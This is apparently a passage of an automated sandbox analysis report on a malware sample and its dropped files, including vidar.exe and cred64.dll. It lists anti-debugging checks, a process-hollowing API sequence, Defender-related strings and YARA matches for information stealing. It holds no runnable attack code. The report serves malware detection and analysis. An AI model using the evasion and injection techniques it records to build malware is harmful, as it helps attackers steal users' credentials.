Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0043982B mov eax, dword ptr fs:[00000030h] 28_2_0043982B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_02F0454B push dword ptr fs:[00000030h] 28_2_02F0454B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0313D7F9 mov eax, dword ptr fs:[00000030h] 28_2_0313D7F9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03139A92 mov eax, dword ptr fs:[00000030h] 28_2_03139A92
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0310092B mov eax, dword ptr fs:[00000030h] 28_2_0310092B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03100D90 mov eax, dword ptr fs:[00000030h] 28_2_03100D90
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_004420F3 GetProcessHeap, 28_2_004420F3
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0042101F SetUnhandledExceptionFilter, 0_2_0042101F
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_004204EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004204EC
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00439DAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00439DAE
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00420EBA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00420EBA
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_04900753 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_04900753
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0491A015 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0491A015
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_04901121 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_04901121
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_004204EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_004204EC
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00439DAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00439DAE
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00420EBA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00420EBA
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04950753 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_04950753
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0496A015 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_0496A015
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04951121 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_04951121
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_004204EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_004204EC
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00420EBA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00420EBA
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0042101F SetUnhandledExceptionFilter, 28_2_0042101F
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00439DAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00439DAE
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03121121 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_03121121
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0313A015 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_0313A015
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03120753 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_03120753

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_004074F0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 0_2_004074F0
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 848
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_004210A6 cpuid 0_2_004210A6
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000101001\vidar.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000102011\build.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0040B375 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0040B375
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0040B2A0 GetUserNameA, 0_2_0040B2A0
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00408180 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 0_2_00408180
Source: Amcache.hve.3.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 28.3.Dctooux.exe.3170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.3100e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.4930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.4930e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.C4v61Eu50U.exe.4950000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.C4v61Eu50U.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.C4v61Eu50U.exe.48e0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.C4v61Eu50U.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.C4v61Eu50U.exe.4950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.Dctooux.exe.3170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.Dctooux.exe.49a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.3100e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.C4v61Eu50U.exe.48e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.Dctooux.exe.49a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000002.2927898895.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1841545556.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1846524053.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1649546292.0000000004950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.2303173826.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1848088766.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1748409001.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929453849.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1843161831.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00431251 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_00431251
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00431F48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_00431F48
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_049114B8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_049114B8
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_049121AF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_049121AF
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00431251 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 20_2_00431251
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00431F48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 20_2_00431F48
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_049614B8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 20_2_049614B8
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_049621AF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 20_2_049621AF
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00402340 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ, 28_2_00402340
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00431251 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 28_2_00431251
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00431F48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 28_2_00431F48
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_031321AF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 28_2_031321AF
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_031314B8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 28_2_031314B8